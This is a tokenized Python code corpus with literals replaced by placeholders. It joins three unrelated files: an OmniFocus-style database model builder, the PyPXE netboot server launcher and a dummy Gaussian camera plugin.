__init__ ( self , <EOL> name = ofattribs [ '<STR_LIT:name>' ] ) <EOL> self . ofattribs = ofattribs <EOL> self . order = ofattribs [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ofattribs : <EOL> self . id = ofattribs [ '<STR_LIT>' ] <EOL> self . link = '<STR_LIT>' + ofattribs [ '<STR_LIT>' ] <EOL> self . status = u'<STR_LIT>' if '<STR_LIT>' in ofattribs and ofattribs [ '<STR_LIT>' ] == <NUM_LIT:0> else u'<STR_LIT>' <EOL> logger . debug ( '<STR_LIT>' , self . id , self . name ) <EOL> class OFTask ( Task ) : <EOL> TABLE = '<STR_LIT>' <EOL> COLUMNS = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> ofattribs = TypeOf ( '<STR_LIT>' , dict ) <EOL> def __init__ ( self , ofattribs ) : <EOL> Task . __init__ ( self , <EOL> name = ofattribs [ '<STR_LIT:name>' ] , <EOL> date_completed = datetimeFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> date_to_start = datetimeFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> date_due = datetimeFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> date_added = datetimeFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> estimated_minutes = intFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> flagged = bool ( ofattribs [ '<STR_LIT>' ] ) , <EOL> context = None ) <EOL> self . ofattribs = ofattribs <EOL> self . order = ofattribs [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ofattribs : <EOL> self . id = ofattribs [ '<STR_LIT>' ] <EOL> self . link = '<STR_LIT>' + ofattribs [ '<STR_LIT>' ] <EOL> noteXMLData = ofattribs [ '<STR_LIT>' ] <EOL> if noteXMLData != None : <EOL> self . note = OFNote ( self , noteXMLData ) <EOL> logger . debug ( '<STR_LIT>' , self . id , self . name ) <EOL> class OFFolder ( Folder ) : <EOL> TABLE = '<STR_LIT>' <EOL> COLUMNS = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ofattribs = TypeOf ( '<STR_LIT>' , dict ) <EOL> def __init__ ( self , ofattribs ) : <EOL> Folder . __init__ ( self , <EOL> name = ofattribs [ '<STR_LIT:name>' ] ) <EOL> self . ofattribs = ofattribs <EOL> self . order = ofattribs [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ofattribs : <EOL> self . id = ofattribs [ '<STR_LIT>' ] <EOL> self . link = '<STR_LIT>' + ofattribs [ '<STR_LIT>' ] <EOL> logger . debug ( '<STR_LIT>' , self . id , self . name ) <EOL> class ProjectInfo ( Node ) : <EOL> TABLE = '<STR_LIT>' <EOL> COLUMNS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' ] <EOL> status = TypeOf ( '<STR_LIT:status>' , unicode ) <EOL> nextTask = TypeOf ( '<STR_LIT>' , str ) <EOL> def __init__ ( self , ofattribs ) : <EOL> Node . __init__ ( self , "<STR_LIT>" ) <EOL> self . ofattribs = ofattribs <EOL> self . status = ofattribs [ '<STR_LIT:status>' ] <EOL> self . next_task = None if ofattribs [ '<STR_LIT>' ] == None else str ( ofattribs [ '<STR_LIT>' ] ) <EOL> class OFProject ( Project ) : <EOL> ofattribs = TypeOf ( '<STR_LIT>' , dict ) <EOL> folder = TypeOf ( '<STR_LIT>' , Folder ) <EOL> project_info = TypeOf ( '<STR_LIT>' , ProjectInfo ) <EOL> def __init__ ( self ) : <EOL> pass <EOL> def query ( conn , clazz ) : <EOL> c = conn . cursor ( ) <EOL> columns = clazz . COLUMNS <EOL> results = { } <EOL> for row in c . execute ( '<STR_LIT>' + ( '<STR_LIT:U+002C>' . join ( columns ) ) + '<STR_LIT>' + clazz . TABLE ) : <EOL> rowData = { } <EOL> for i in range ( <NUM_LIT:0> , len ( columns ) ) : <EOL> key = columns [ i ] <EOL> val = row [ i ] <EOL> rowData [ key ] = val <EOL> node = clazz ( rowData ) <EOL> results [ rowData [ columns [ <NUM_LIT:0> ] ] ] = node <EOL> c . close ( ) <EOL> return results <EOL> def transmute_projects ( project_infos , tasks ) : <EOL> '''<STR_LIT>''' <EOL> logger . debug ( '<STR_LIT>' ) <EOL> projects = { } <EOL> for project in tasks . values ( ) : <EOL> if project . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , project . id , project . name ) <EOL> projects [ project . ofattribs [ '<STR_LIT>' ] ] = project <EOL> project_info = project_infos [ project . ofattribs [ '<STR_LIT>' ] ] <EOL> project . __class__ = OFProject <EOL> project . __init__ ( ) <EOL> project_info . project = project <EOL> project . type = PROJECT <EOL> project . project_info = project_info <EOL> project . status = project_info . status <EOL> return projects <EOL> def wire_projects_and_folders ( projects , folders , tasks ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for project in projects . values ( ) : <EOL> project_info = project . project_info <EOL> if project . project_info != None : <EOL> folder_ref = project_info . ofattribs [ '<STR_LIT>' ] <EOL> if folder_ref != None : <EOL> logger . debug ( '<STR_LIT>' , project . id , project . name ) <EOL> folder = folders [ folder_ref ] <EOL> project . folder = folder <EOL> folder . add_child ( project ) <EOL> if project_info . next_task != None : <EOL> task = tasks [ project_info . next_task ] <EOL> task . next = True <EOL> def wire_task_hierarchy ( tasks ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for task in tasks . values ( ) : <EOL> if task . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , task . id , task . name ) <EOL> parent = tasks [ task . ofattribs [ '<STR_LIT>' ] ] <EOL> parent . add_child ( task ) <EOL> def wire_tasks_to_enclosing_projects ( project_infos , tasks , inbox ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for task in tasks . values ( ) : <EOL> if task . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , task . id , task . name ) <EOL> project_info = project_infos [ task . ofattribs [ '<STR_LIT>' ] ] <EOL> project = project_info . project <EOL> task . project = project <EOL> elif task . ofattribs [ '<STR_LIT>' ] : <EOL> inbox . add_child ( task ) <EOL> def wire_tasks_and_contexts ( contexts , tasks , no_context ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for task in tasks . values ( ) : <EOL> logger . debug ( '<STR_LIT>' , task . id , task . name ) <EOL> if task . ofattribs [ '<STR_LIT>' ] != None : <EOL> context = contexts [ task . ofattribs [ '<STR_LIT>' ] ] <EOL> task . context = context <EOL> context . children . append ( task ) <EOL> else : <EOL> task . context = no_context <EOL> no_context . children . append ( task ) <EOL> def wire_folder_hierarchy ( folders ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for folder in folders . values ( ) : <EOL> if folder . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , folder . id , folder . name ) <EOL> parent = folders [ folder . ofattribs [ '<STR_LIT>' ] ] <EOL> parent . add_child ( folder ) <EOL> def wire_context_hierarchy ( contexts ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for context in contexts . values ( ) : <EOL> if context . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , context . id , context . name ) <EOL> parent = contexts [ context . ofattribs [ '<STR_LIT>' ] ] <EOL> parent . add_child ( context ) <EOL> def only_roots ( items ) : <EOL> roots = [ ] <EOL> for item in items : <EOL> if item . parent == None : <EOL> roots . append ( item ) <EOL> return roots <EOL> def build_model ( db ) : <EOL> conn = sqlite3 . connect ( db ) <EOL> contexts = query ( conn , clazz = OFContext ) <EOL> no_context = Context ( name = '<STR_LIT>' ) <EOL> inbox = Project ( name = '<STR_LIT>' ) <EOL> project_infos = query ( conn , clazz = ProjectInfo ) <EOL> folders = query ( conn , clazz = OFFolder ) <EOL> tasks = query ( conn , clazz = OFTask ) <EOL> projects = transmute_projects ( project_infos , tasks ) <EOL> wire_projects_and_folders ( projects , folders , tasks ) <EOL> wire_task_hierarchy ( tasks ) <EOL> wire_tasks_to_enclosing_projects ( project_infos , tasks , inbox ) <EOL> wire_tasks_and_contexts ( contexts , tasks , no_context ) <EOL> wire_folder_hierarchy ( folders ) <EOL> wire_context_hierarchy ( contexts ) <EOL> conn . close ( ) <EOL> project_roots = only_roots ( projects . values ( ) ) <EOL> folder_roots = only_roots ( folders . values ( ) ) <EOL> root_projects_and_folders = project_roots + folder_roots <EOL> root_contexts = only_roots ( contexts . values ( ) ) <EOL> root_contexts . insert ( <NUM_LIT:0> , no_context ) <EOL> root_projects_and_folders . insert ( <NUM_LIT:0> , inbox ) <EOL> sort ( root_projects_and_folders ) <EOL> sort ( root_contexts ) <EOL> root_folder = Folder ( name = '<STR_LIT>' ) <EOL> for child in root_projects_and_folders : <EOL> root_folder . add_child ( child ) <EOL> root_context = Context ( name = '<STR_LIT>' , status = '<STR_LIT>' ) <EOL> for child in root_contexts : <EOL> root_context . add_child ( child ) <EOL> return root_folder , root_context <EOL> def find_database ( databases ) : <EOL> home = environ [ '<STR_LIT>' ] <EOL> databases = [ home + x for x in databases ] <EOL> for db in databases : <EOL> logger . debug ( "<STR_LIT>" , db ) <EOL> if ( path . exists ( db ) ) : <EOL> logger . info ( "<STR_LIT>" , db ) <EOL> return db <EOL> raise IOError ( '<STR_LIT>' + databases ) </s>
<s> import threading <EOL> import os <EOL> import sys <EOL> import json <EOL> import logging <EOL> import logging . handlers <EOL> try : <EOL> import argparse <EOL> except ImportError : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> from time import sleep <EOL> from pypxe import tftp <EOL> from pypxe import dhcp <EOL> from pypxe import http <EOL> from pypxe import nbd <EOL> args = None <EOL> SETTINGS = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> def parse_cli_arguments ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' , formatter_class = argparse . ArgumentDefaultsHelpFormatter ) <EOL> ipxeexclusive = parser . add_mutually_exclusive_group ( required = False ) <EOL> ipxeexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> ipxeexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = not SETTINGS [ '<STR_LIT>' ] ) <EOL> httpexclusive = parser . add_mutually_exclusive_group ( required = False ) <EOL> httpexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> httpexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = not SETTINGS [ '<STR_LIT>' ] ) <EOL> tftpexclusive = parser . add_mutually_exclusive_group ( required = False ) <EOL> tftpexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> tftpexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = not SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group = parser . add_argument_group ( title = '<STR_LIT>' , description = '<STR_LIT>' ) <EOL> exclusive = dhcp_group . add_mutually_exclusive_group ( required = False ) <EOL> exclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = not SETTINGS [ '<STR_LIT>' ] ) <EOL> exclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> exclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = False ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group = parser . add_argument_group ( title = '<STR_LIT>' , description = '<STR_LIT>' ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> return parser . parse_args ( ) <EOL> def do_debug ( service ) : <EOL> return ( ( service in args . MODE_DEBUG . lower ( ) <EOL> or '<STR_LIT:all>' in args . MODE_DEBUG . lower ( ) ) <EOL> and '<STR_LIT>' . format ( service ) not in args . MODE_DEBUG . lower ( ) ) <EOL> def do_verbose ( service ) : <EOL> return ( ( service in args . MODE_VERBOSE . lower ( ) <EOL> or '<STR_LIT:all>' in args . MODE_VERBOSE . lower ( ) ) <EOL> and '<STR_LIT>' . format ( service ) not in args . MODE_VERBOSE . lower ( ) ) <EOL> def main ( ) : <EOL> global SETTINGS , args <EOL> try : <EOL> if os . getuid ( ) != <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> args = parse_cli_arguments ( ) <EOL> if args . JSON_CONFIG : <EOL> try : <EOL> config_file = open ( args . JSON_CONFIG , '<STR_LIT:rb>' ) <EOL> except IOError : <EOL> sys . exit ( '<STR_LIT>' . format ( args . JSON_CONFIG ) ) <EOL> try : <EOL> loaded_config = json . load ( config_file ) <EOL> config_file . close ( ) <EOL> except ValueError : <EOL> sys . exit ( '<STR_LIT>' . format ( args . JSON_CONFIG ) ) <EOL> for setting in loaded_config : <EOL> if type ( loaded_config [ setting ] ) is unicode : <EOL> loaded_config [ setting ] = loaded_config [ setting ] . encode ( '<STR_LIT:ascii>' ) <EOL> SETTINGS . update ( loaded_config ) <EOL> args = parse_cli_arguments ( ) <EOL> if args . STATIC_CONFIG : <EOL> try : <EOL> static_config = open ( args . STATIC_CONFIG , '<STR_LIT:rb>' ) <EOL> except IOError : <EOL> sys . exit ( "<STR_LIT>" . format ( args . STATIC_CONFIG ) ) <EOL> try : <EOL> loaded_statics = json . load ( static_config ) <EOL> static_config . close ( ) <EOL> except ValueError : <EOL> sys . exit ( "<STR_LIT>" . format ( args . STATIC_CONFIG ) ) <EOL> else : <EOL> loaded_statics = dict ( ) <EOL> sys_logger = logging . getLogger ( '<STR_LIT>' ) <EOL> if args . SYSLOG_SERVER : <EOL> handler = logging . handlers . SysLogHandler ( address = ( args . SYSLOG_SERVER , int ( args . SYSLOG_PORT ) ) ) <EOL> else : <EOL> handler = logging . StreamHandler ( ) <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> handler . setFormatter ( formatter ) <EOL> sys_logger . addHandler ( handler ) <EOL> sys_logger . setLevel ( logging . INFO ) <EOL> if args . USE_HTTP and not args . USE_IPXE and not args . USE_DHCP : <EOL> sys_logger . warning ( '<STR_LIT>' ) <EOL> if args . DHCP_MODE_PROXY : <EOL> args . USE_DHCP = True <EOL> if args . NETBOOT_FILE == '<STR_LIT>' : <EOL> if not args . USE_IPXE : <EOL> args . NETBOOT_FILE = '<STR_LIT>' <EOL> elif not args . USE_HTTP : <EOL> args . NETBOOT_FILE = '<STR_LIT>' <EOL> else : <EOL> args . NETBOOT_FILE = '<STR_LIT>' <EOL> if args . NBD_WRITE and not args . NBD_COW : <EOL> sys_logger . warning ( '<STR_LIT>' ) <EOL> if args . NBD_COW_IN_MEM or args . NBD_COPY_TO_RAM : <EOL> sys_logger . warning ( '<STR_LIT>' ) <EOL> if args . NBD_COW and not args . NBD_WRITE : <EOL> args . NBD_WRITE = True <EOL> running_services = [ ] <EOL> if args . USE_TFTP : <EOL> tftp_logger = sys_logger . getChild ( '<STR_LIT>' ) <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> tftp_server = tftp . TFTPD ( mode_debug = do_debug ( '<STR_LIT>' ) , mode_verbose = do_verbose ( '<STR_LIT>' ) , logger = tftp_logger , netboot_directory = args . NETBOOT_DIR ) <EOL> tftpd = threading . Thread ( target = tftp_server . listen ) <EOL> tftpd . daemon = True <EOL> tftpd . start ( ) <EOL> running_services . append ( tftpd ) <EOL> if args . USE_DHCP : <EOL> dhcp_logger = sys_logger . getChild ( '<STR_LIT>' ) <EOL> if args . DHCP_MODE_PROXY : <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> else : <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> dhcp_server = dhcp . DHCPD ( <EOL> ip = args . DHCP_SERVER_IP , <EOL> port = args . DHCP_SERVER_PORT , <EOL> offer_from = args . DHCP_OFFER_BEGIN , <EOL> offer_to = args . DHCP_OFFER_END , <EOL> subnet_mask = args . DHCP_SUBNET , <EOL> router = args . DHCP_ROUTER , <EOL> dns_server = args . DHCP_DNS , <EOL> broadcast = args . DHCP_BROADCAST , <EOL> file_server = args . DHCP_FILESERVER , <EOL> file_name = args . NETBOOT_FILE , <EOL> use_ipxe = args . USE_IPXE , <EOL> use_http = args . USE_HTTP , <EOL> mode_proxy = args . DHCP_MODE_PROXY , <EOL> mode_debug = do_debug ( '<STR_LIT>' ) , <EOL> mode_verbose = do_verbose ( '<STR_LIT>' ) , <EOL> whitelist = args . DHCP_WHITELIST , <EOL> static_config = loaded_statics , <EOL> logger = dhcp_logger , <EOL> saveleases = args . LEASES_FILE ) <EOL> dhcpd = threading . Thread ( target = dhcp_server . listen ) <EOL> dhcpd . daemon = True <EOL> dhcpd . start ( ) <EOL> running_services . append ( dhcpd ) <EOL> if args . USE_HTTP : <EOL> http_logger = sys_logger . getChild ( '<STR_LIT>' ) <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> http_server = http . HTTPD ( mode_debug = do_debug ( '<STR_LIT:http>' ) , mode_verbose = do_debug ( '<STR_LIT:http>' ) , logger = http_logger , netboot_directory = args . NETBOOT_DIR ) <EOL> httpd = threading . Thread ( target = http_server . listen ) <EOL> httpd . daemon = True <EOL> httpd . start ( ) <EOL> running_services . append ( httpd ) <EOL> if args . NBD_BLOCK_DEVICE : <EOL> nbd_logger = sys_logger . getChild ( '<STR_LIT>' ) <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> nbd_server = nbd . NBD ( <EOL> block_device = args . NBD_BLOCK_DEVICE , <EOL> write = args . NBD_WRITE , <EOL> cow = args . NBD_COW , <EOL> in_mem = args . NBD_COW_IN_MEM , <EOL> copy_to_ram = args . NBD_COPY_TO_RAM , <EOL> ip = args . NBD_SERVER_IP , <EOL> port = args . NBD_PORT , <EOL> mode_debug = do_debug ( '<STR_LIT>' ) , <EOL> mode_verbose = do_verbose ( '<STR_LIT>' ) , <EOL> logger = nbd_logger , <EOL> netboot_directory = args . NETBOOT_DIR ) <EOL> nbdd = threading . Thread ( target = nbd_server . listen ) <EOL> nbdd . daemon = True <EOL> nbdd . start ( ) <EOL> running_services . append ( nbdd ) <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> while map ( lambda x : x . isAlive ( ) , running_services ) : <EOL> sleep ( <NUM_LIT:1> ) <EOL> except KeyboardInterrupt : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import time <EOL> import numpy as N <EOL> import numpy . random <EOL> from traits . api import Int , Constant , Range , Property , cached_property <EOL> from traitsui . api import View , Item , HGroup , VGroup , Label <EOL> from Camera import Camera <EOL> class DummyGaussian ( Camera ) : <EOL> plugin_info = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _zero = Constant ( <NUM_LIT:0.0> ) <EOL> _x_resolution = Property ( fget = lambda self : self . resolution [ <NUM_LIT:0> ] , <EOL> depends_on = '<STR_LIT>' ) <EOL> _y_resolution = Property ( fget = lambda self : self . resolution [ <NUM_LIT:1> ] , <EOL> depends_on = '<STR_LIT>' ) <EOL> _half_x_resolution = Property ( depends_on = '<STR_LIT>' ) <EOL> _half_y_resolution = Property ( depends_on = '<STR_LIT>' ) <EOL> _half_minimum_resolution = Property ( depends_on = '<STR_LIT>' ) <EOL> centroid_x = Range ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> centroid_y = Range ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> centroid = Property ( depends_on = '<STR_LIT>' ) <EOL> radius = Range ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) <EOL> amplitude = Int ( <NUM_LIT> ) <EOL> noise_amplitude = Int ( <NUM_LIT> ) <EOL> view = View ( <EOL> HGroup ( <EOL> Item ( '<STR_LIT>' , style = '<STR_LIT>' ) , <EOL> Label ( '<STR_LIT>' ) ) , <EOL> VGroup ( <EOL> Item ( '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' ) ) , <EOL> Item ( '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' ) , <EOL> title = '<STR_LIT>' ) <EOL> def __init__ ( self , ** traits ) : <EOL> super ( DummyGaussian , self ) . __init__ ( resolution = ( <NUM_LIT> , <NUM_LIT> ) , <EOL> id_string = '<STR_LIT>' , <EOL> ** traits ) <EOL> self . _supported_resolutions = [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> @ cached_property <EOL> def _get__half_x_resolution ( self ) : <EOL> return self . resolution [ <NUM_LIT:0> ] / <NUM_LIT> <EOL> @ cached_property <EOL> def _get__half_y_resolution ( self ) : <EOL> return self . resolution [ <NUM_LIT:1> ] / <NUM_LIT> <EOL> @ cached_property <EOL> def _get__half_minimum_resolution ( self ) : <EOL> return min ( self . _half_x_resolution , self . _half_y_resolution ) <EOL> @ cached_property <EOL> def _get_centroid ( self ) : <EOL> return ( self . centroid_x , self . centroid_y ) <EOL> def _set_centroid ( self , value ) : <EOL> self . centroid_x , self . centroid_y = value <EOL> def open ( self ) : <EOL> pass <EOL> def close ( self ) : <EOL> pass <EOL> def query_frame ( self ) : <EOL> """<STR_LIT>""" <EOL> width , height = self . resolution <EOL> x , y = N . ogrid [ <NUM_LIT:0> : height , <NUM_LIT:0> : width ] <EOL> y0 , x0 = self . centroid <EOL> r = N . hypot ( x - x0 , y - y0 ) <EOL> self . frame = N . array ( N . exp ( - r ** <NUM_LIT:2> / self . radius ** <NUM_LIT:2> ) * self . amplitude , <EOL> dtype = N . uint16 ) <EOL> self . frame += N . random . uniform ( low = <NUM_LIT:0> , high = self . noise_amplitude , <EOL> size = ( height , width ) ) <EOL> time . sleep ( <NUM_LIT:1.0> / self . frame_rate ) <EOL> def find_resolutions ( self ) : <EOL> return self . _supported_resolutions </s>
